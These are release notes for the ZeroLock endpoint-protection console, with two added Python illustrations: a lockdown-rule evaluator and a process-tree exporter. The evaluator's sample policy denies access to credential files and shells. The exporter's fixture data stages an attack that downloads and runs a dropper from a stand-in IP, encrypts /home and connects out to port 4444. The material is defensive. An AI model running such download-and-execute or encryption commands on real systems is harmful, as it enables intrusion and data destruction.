ZeroLock™ Management Console 1.4.x - Build Release Notes

Important Information Regarding ZeroLock™ Version 1.4.x

Build notes contain important information you should know before you install the ZeroLock solution. Before installing this build, familiarize yourself with all the new features listed in this document.


System requirements and update instructions

For more information on system requirements and installation instructions, see the following knowledge base articles:  

Minimum System Requirements

ZeroLock™ Update Instructions


Build 1.4.36

July 2023

Name        Description

SERVER-42   The New User Role template, previously blank, now comes pre-filled with the superuser role's details.

SERVER-43   Fixed the New User Roles UI going blank after clicking Create.

SERVER-55   Fixed Add New Group not opening.

SERVER-57   Fixed the cause of "U:superuser - invalid login - no such user" messages in the Dashboard Activity Log for a logged-in superuser.

SERVER-61   Increased the font size of the loading page shown on first start of the ZeroLock Management Console, and changed the message to read: “ZeroLock Management Portal is loading…”

ZERO-1085   Fixed an issue where the MFA prompt was not generated after SSH-MFA setup.


Build 1.4.35

June 2023

Name        Description

ZERO-1152   Resolved an issue between the Recommended ruleset and the start of the MariaDB container.

ZERO-1166   Resolved an issue with a fresh ZeroLock Management Console build failing.

ZERO-1179   Improved table performance when logging in from a fresh browser.

ZERO-1180   Improved function call speed.

ZERO-1194   Enhanced initialization of endpoints in the database, improving endpoint startup times.

ZERO-1195   Added queueing to the collector to improve endpoint scalability during high-load periods.

ZERO-1206   Improved report generation and its interaction with the Activity Log.



Build 1.4.32

April 2023

ALERTS Homepage

  • Under the ACTIONS dropdown list, the Remediate Alert entry has been removed as redundant, reducing the available actions to three (3): Kill and Remediate Alert, Kill Alert, and Release Alert.
  • The same change applies to the Alert Detail page.

ENDPOINTS Homepage

When viewing Endpoints, the options in the ACTIONS drop-down menu have changed. The Shutdown option has been replaced with three (3) alternative options: 
  • DEACTIVATE ENDPOINT PROTECTION turns off only Baldur, leaving Tyr active. With Baldur off, ZeroLock’s defenses are no longer active. When pressing Deactivate, customers should expect the status icon to go red for a moment and then yellow until protection is reactivated. The user can still access the in-UI shell in this state, but the system is completely unprotected. (NOTE: Deactivation restarts all monitored processes.)
  • ACTIVATE ENDPOINT PROTECTION turns on Baldur, activating ZeroLock and protecting the system from attack. All functionality is available in this state.
  • UNINSTALL ENDPOINT AGENT deactivates ZeroLock protection and completely uninstalls both Baldur and Tyr from the system.

Single Sign-On (SSO)

  • Included in this build is support for Single Sign-On (SSO). Users no longer need to be added to the ZeroLock server database; use the SSO feature to manage your organization's ZeroLock users from a known IdP.

Multi-Tenancy

  • ZeroLock’s support of multi-tenancy allows an organization to create multiple tenants while keeping all tenants’ data isolated and separated.

Build 1.4.0

November 2022

NOTE: ZeroLock maintains the same efficacy and detection capabilities without internet or management console access. This capability is required for dark/air-gapped environments and certain embedded or IoT systems.

Malware Detection Engines

  • Ransomware: The Ransomware engine uses behavioral detection to detect, stop, and remove/remediate ransomware regardless of its form. ZeroLock detects both fileless and file-based malware, restores the filesystem to its pre-attack state, and prevents attackers from gaining persistence.

  • Cryptojacking: The Cryptojacking engine uses machine learning to detect, stop, and remove/remediate any crypto mining software.

  • Anti-Tampering: ZeroLock monitors for attempts to modify agent files or to disable the agent.

  • Canary files: Canary files are used to place “traps” around the file system to detect when a process attempts to access or modify a file or directory that it should not. One specific class of malware Canary files protect against is Wiperware. Using strategically placed Canary files in sensitive directories across the system's disk(s), ZeroLock can stop Wiperware attacks. Canary rules undo any damage caused during an attack, in the same way as Ransomware remediation.

  • HASH/Signature checking: The Hash engine uses SHA-256 hashes to either Allow or Block a file from executing on a protected system. Hashes are not a part of the Vali Cyber advanced behavior detection for malware. By default, ZeroLock does not use hashes in its detection methods.

  • Lockdown Rules: The Lockdown Rules engine lets you define and control which behaviors processes on the protected system are allowed to perform. Rules are divided into three distinct types, each with an associated Rule Policy.

    • Rule Types:

      • File Access: Allow or restrict access to files for a specific process or process tree.

      • Network Access: Allow or restrict network communication and traffic for a specific process or process tree to or from external systems.

      • Program Execution: Controls which programs a process or process tree may execute. This is similar in intent to AppArmor or SELinux rules, but simpler to define, and the rules are applied uniformly from a central location across Linux distributions.

    • Implement best practices with the provided Recommended Rules. Vali Cyber’s Threat Research Team creates the Recommended Rules based on industry best practices, known CVEs, the behavior of common malware, and MITRE framework mappings.

    • Rules are highly configurable, allowing granular control of the behavior of processes to execute, access files, and communicate with external systems.

    • ZeroLock server includes a Regex editor and tester to assist with rule creation allowing you to create and test rules before implementing them.
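To make the Hash engine and the three Lockdown Rule types concrete, here is an added example that is not ZeroLock's own rule syntax or code: a hypothetical evaluator in which each rule is scoped to a process name (and, optionally, its whole process tree), matches its target with a regular expression, and returns an allow or deny decision, with program-execution events first checked against SHA-256 allow/block lists. The Rule and Proc fields, the sample policy, the process names and the digest value are all constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import FrozenSet, List, Optional


@dataclass
class Rule:
    """Hypothetical lockdown rule (illustration only, not ZeroLock's syntax)."""
    kind: str          # "file", "network" or "exec"
    process: str       # regex on the executable name the rule is scoped to
    target: str        # regex on a file path, "host:port" or executable path
    action: str        # "allow" or "deny"
    tree: bool = True  # True: also covers every descendant of a matching process


@dataclass
class Proc:
    pid: int
    name: str
    parent: Optional["Proc"] = None

    def lineage(self) -> List["Proc"]:
        """This process followed by its ancestors, nearest first."""
        chain, p = [], self
        while p is not None:
            chain.append(p)
            p = p.parent
        return chain


def rule_scopes(rule: Rule, proc: Proc) -> bool:
    """True if the rule's process pattern matches proc, or an ancestor when tree=True."""
    candidates = proc.lineage() if rule.tree else [proc]
    return any(re.fullmatch(rule.process, p.name) for p in candidates)


def decide(rules: List[Rule], kind: str, proc: Proc, target: str,
           sha256: str = "",
           allow_hashes: FrozenSet[str] = frozenset(),
           block_hashes: FrozenSet[str] = frozenset()) -> str:
    """First matching rule wins. Execution events are checked against the hash
    lists before any rule, mirroring a hash engine that can Allow or Block a file
    outright. The default is allow, so a restrictive policy must end with an
    explicit catch-all deny for each rule type it wants to lock down."""
    if kind == "exec" and sha256:
        if sha256 in block_hashes:
            return "deny"
        if sha256 in allow_hashes:
            return "allow"
    for r in rules:
        if r.kind == kind and rule_scopes(r, proc) and re.fullmatch(r.target, target):
            return r.action
    return "allow"


# Constructed policy for a web server tree: read only the document root, reach
# only the database, and never spawn a shell. Order matters: the catch-all
# network deny comes after the database allow.
POLICY = [
    Rule("file", r"nginx", r"/var/www/.*", "allow"),
    Rule("file", r"nginx", r"/etc/(shadow|passwd)", "deny"),
    Rule("network", r"nginx", r"10\.0\.0\.5:5432", "allow"),
    Rule("network", r"nginx", r".*", "deny"),
    Rule("exec", r"nginx", r"/bin/(ba)?sh", "deny"),
]

# Constructed placeholder digest, not the hash of any real file.
BLOCKED_HASHES = frozenset({"00" * 31 + "ff"})

# Constructed process tree: php-fpm is inside the nginx tree, cron is not.
init = Proc(1, "systemd")
nginx = Proc(200, "nginx", init)
worker = Proc(201, "nginx", nginx)
php = Proc(300, "php-fpm", worker)
cron = Proc(400, "cron", init)


def demo() -> dict:
    """Evaluate a handful of events against POLICY."""
    return {
        "worker reads docroot": decide(POLICY, "file", worker, "/var/www/index.html"),
        "worker reads shadow": decide(POLICY, "file", worker, "/etc/shadow"),
        "php connects to db": decide(POLICY, "network", php, "10.0.0.5:5432"),
        "php connects out": decide(POLICY, "network", php, "203.0.113.9:443"),
        "php spawns shell": decide(POLICY, "exec", php, "/bin/sh"),
        "cron spawns shell": decide(POLICY, "exec", cron, "/bin/sh"),
        "cron runs blocked hash": decide(POLICY, "exec", cron, "/tmp/x",
                                         sha256="00" * 31 + "ff",
                                         block_hashes=BLOCKED_HASHES),
    }


if __name__ == "__main__":
    for event, verdict in demo().items():
        print(f"{verdict:5s} {event}")
```

Two points worth noting when writing rules of this shape: a process-tree rule reaches children that have a different executable name (php-fpm is denied a shell because its ancestor is nginx, while cron is untouched), and because the default is allow, a rule set that only lists allows locks nothing down until a catch-all deny closes it.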

Authentication Hardening

  • Multifactor Authentication for SSH: Lets you set up and control SSH access to systems centrally, so that a stolen password or key alone is not enough to log in.

  • User management: Role-based access control allows granular control over user permissions within the ZeroLock portal. Multifactor Authentication for user logins enforces MFA for access to the ZeroLock portal.

File Cache

Automatic file restoration uses a proprietary protected cache mechanism to remediate damaged or destroyed files and to undo attempts the malware makes to persist. The cache is highly configurable: users can set the maximum cache size and the maximum size of files that can be backed up.

Role Based Access Control

The ZeroLock UI and API are all protected by fine-grained role-based access control rules. User access to data and pages within the UI can be limited by role. Roles are highly configurable, and changes to role permissions take effect immediately, without requiring users to log out.

Threat response capabilities

Automatic response options: a complete collection of IoCs and IoAs is gathered and available for an administrator or analyst to review at any time during or after an attack. Alerts can be delivered over SMTP by configuring email settings in the ZeroLock UI. The available response types are:

  • Do Nothing: This is an Alert Only setting. The processes are allowed to continue running.

  • Kill: This response Kills the process(es) involved in malicious behavior and an alert is issued.

  • Remediate: This response Kills the process(es) involved in malicious behavior, issues an alert, and then remediates any damage to files, attempts at persistence, and closes all network connections associated with the malicious process(es).

  • Suspend: This response pauses the process(es) involved in malicious behavior, and an alert is issued. Setting the response type to suspend gives an analyst time to review the alert and creates a decision point to allow the process to continue executing (Release) or to stop the processes identified in the attack (Kill) and undo any damage and attempts at persistence (Remediate).

  • Auto-Quarantine: This response type automatically quarantines impacted systems on a network, preventing lateral movement by attackers. Systems are only accessible through a command shell in the ZeroLock UI.

Threat hunting capabilities

Process trees on alerts are built dynamically from the point of incursion to the point of detection/remediation. The information captured for each process includes:

  • Process name

  • PID

  • Parent-child process relationships

  • Executable path and name

  • Executable hashes

  • Full command-line arguments

  • IP connections received and initiated from/to the process

  • User and Group permissions

  • Files that are created, modified, or deleted

All IoCs and IoAs can be exported to JSON or CSV files or pushed to an external system via secure APIs.
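The following is an added example, not ZeroLock's code or export schema, showing what the process-tree and export capabilities described above amount to in practice: from a set of per-process records carrying the fields listed (PID, parent PID, executable, hashes, command line, user/group, connections, file changes), it rebuilds the tree, walks from the detected process back to the point of incursion, and exports the affected subtree as JSON and CSV. The records, PIDs, addresses and digests are constructed for illustration; the incursion point (the SSH session) is supplied by the caller rather than inferred.

```python
import csv
import io
import json
from typing import Dict, List

# Constructed process records in the shape the text lists (not ZeroLock's schema):
# an SSH session spawns a shell, which downloads and runs a dropper.
EVENTS = [
    {"pid": 1, "ppid": 0, "name": "systemd", "exe": "/usr/lib/systemd/systemd",
     "cmdline": "/usr/lib/systemd/systemd", "sha256": "11" * 32, "user": "root",
     "group": "root", "connections": [], "files": []},
    {"pid": 812, "ppid": 1, "name": "sshd", "exe": "/usr/sbin/sshd",
     "cmdline": "sshd: deploy [priv]", "sha256": "22" * 32, "user": "root",
     "group": "root", "connections": ["in 198.51.100.7:50122"], "files": []},
    {"pid": 2310, "ppid": 812, "name": "bash", "exe": "/usr/bin/bash",
     "cmdline": "-bash", "sha256": "33" * 32, "user": "deploy", "group": "deploy",
     "connections": [], "files": []},
    {"pid": 2345, "ppid": 2310, "name": "curl", "exe": "/usr/bin/curl",
     "cmdline": "curl -sO http://203.0.113.9/.x", "sha256": "44" * 32,
     "user": "deploy", "group": "deploy",
     "connections": ["out 203.0.113.9:80"], "files": ["created /tmp/.x"]},
    {"pid": 2350, "ppid": 2310, "name": ".x", "exe": "/tmp/.x",
     "cmdline": "/tmp/.x --encrypt /home", "sha256": "55" * 32,
     "user": "deploy", "group": "deploy",
     "connections": ["out 203.0.113.9:4444"],
     "files": ["modified /home/deploy/notes.txt", "deleted /home/deploy/notes.txt.bak"]},
]
LIST_FIELDS = ("connections", "files")


def index(events: List[dict]):
    """Map pid -> record and ppid -> [child pids]."""
    by_pid = {e["pid"]: e for e in events}
    children: Dict[int, List[int]] = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e["pid"])
    return by_pid, children


def incursion_chain(events: List[dict], incursion_pid: int, detected_pid: int) -> List[int]:
    """Walk parent links from the detected process up to the incursion point.
    Returns pids from incursion to detection; raises if the two are unrelated."""
    by_pid, _ = index(events)
    chain, pid = [], detected_pid
    while pid in by_pid:
        chain.append(pid)
        if pid == incursion_pid:
            return list(reversed(chain))
        pid = by_pid[pid]["ppid"]
    raise ValueError(f"pid {incursion_pid} is not an ancestor of pid {detected_pid}")


def subtree(events: List[dict], root_pid: int) -> List[dict]:
    """Every record under root_pid (inclusive), depth first, for an IoC export."""
    by_pid, children = index(events)
    out, stack = [], [root_pid]
    while stack:
        pid = stack.pop()
        out.append(by_pid[pid])
        stack.extend(reversed(children.get(pid, [])))
    return out


def render_tree(events: List[dict], root_pid: int) -> str:
    """Indented text view of the tree, the way an analyst reads a process chain."""
    by_pid, children = index(events)
    lines: List[str] = []

    def walk(pid: int, depth: int) -> None:
        e = by_pid[pid]
        lines.append(f"{'  ' * depth}{e['pid']} {e['name']} ({e['user']}) {e['cmdline']}")
        for c in children.get(pid, []):
            walk(c, depth + 1)

    walk(root_pid, 0)
    return "\n".join(lines)


def to_json(records: List[dict]) -> str:
    return json.dumps(records, indent=2)


def to_csv(records: List[dict]) -> str:
    """Flat CSV; multi-valued fields are joined with ';' so one row is one process."""
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=list(records[0].keys()))
    w.writeheader()
    for r in records:
        w.writerow({k: ";".join(v) if k in LIST_FIELDS else v for k, v in r.items()})
    return buf.getvalue()


if __name__ == "__main__":
    print(render_tree(EVENTS, 812))
    print("chain:", incursion_chain(EVENTS, 812, 2350))
    print(to_csv(subtree(EVENTS, 812)))
```

The chain walk deliberately fails loudly when the supplied incursion process is not an ancestor of the detected one, since a chain that silently stops at PID 1 would hide a mistaken starting point. The CSV export flattens the multi-valued connection and file fields; keep the JSON form when the receiving system (a SIEM, for example) needs them as separate values.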

ZeroLock Deployment

Endpoint Agent

No kernel module is required when installing the ZeroLock endpoint agent. ZeroLock can be installed on any Linux operating system running kernel version 3.5 or greater.

Four installer options are offered for deploying the ZeroLock endpoint agent. These options allow deployment automation with infrastructure tools such as Kubernetes, Ansible, Puppet or Chef. Installers:

  • Curl – copy & paste command
  • Wget – copy & paste command
  • self-extracting file
  • tar.gz file

Server Containers

The ZeroLock server is made up of four containers. The containers provide connectivity to the ZeroLock endpoint agent and the ZeroLock Portal. A tar.gz installer is provided for customer managed implementation.

ZeroLock endpoint agent container support

Deploy inside containers for self-protecting systems, as a sidecar with Kubernetes, or install directly on the host OS. The agent can be deployed as part of the CI/CD pipeline, integrating into existing DevSecOps processes.

Reporting and Real-Time activity log

All user activity is available in real time, including portal logins and logouts, SSH sessions, policy and rule updates, and actions taken on alerts. Where relevant, threat activity includes the current status, the system impacted, and the number of affected files. Endpoint agent activity is also logged, including new deployments, agent deactivations, agent detections, and alerts.
All data is exportable to CSV and/or JSON, or accessible by external systems such as Splunk via secure APIs. Configurable ad-hoc reports can be created from the activity and alert logs.

ZeroLock self-management

The new installer automatically updates old databases when you have deployed the on-premises ZeroLock Server. ZeroLock Server supports multiple versions of the agent, allowing new agents, features, and updates to be tested in a test environment or on specific systems within your environment. The option to upgrade or downgrade an endpoint agent through the UI, individually or in bulk, assists in endpoint management. The endpoint agent and agent detection engines can be updated through data files uploaded via the UI.